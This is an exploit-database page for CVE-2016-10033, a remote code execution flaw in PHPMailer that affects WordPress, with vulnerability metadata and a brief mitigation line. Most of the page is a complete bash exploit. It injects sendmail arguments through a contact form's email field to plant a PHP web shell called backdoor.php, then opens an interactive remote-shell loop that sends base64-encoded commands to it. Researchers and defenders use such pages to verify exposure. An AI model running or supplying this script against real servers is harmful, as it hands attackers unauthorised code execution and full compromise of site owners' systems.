header-logo
Suggest Exploit
vendor:
N/A
by:
opsxcq
9,8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: CVE-2016-10033
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-10033/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10045/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-10033/
Other Scripts: N/A
Tags: seclists,cve,cve2016,rce,edb,wordpress
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2016-10033https://www.exploit-db.com/exploits/40970/https://www.exploit-db.com/exploits/40968/http://seclists.org/fulldisclosure/2016/Dec/78
Nuclei Metadata: {'max-request': 2, 'vendor': 'phpmailer_project', 'product': 'phpmailer'}
Platforms Tested: Linux
2016

Exploit for CVE-2016-10033

WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any application logic.
Source

Exploit-DB raw data:

#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033

echo '[+] CVE-2016-10033 exploit by opsxcq'

if [ -z "$1" ]
then
    echo '[-] Please inform an host as parameter'
    exit -1
fi

host=$1

echo '[+] Exploiting '$host

curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'

cmd='whoami'
while [ "$cmd" != 'exit' ]
do
    echo '[+] Running '$cmd
    curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
    echo
    read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'

Navigation

Suggest Exploit

Services By CQR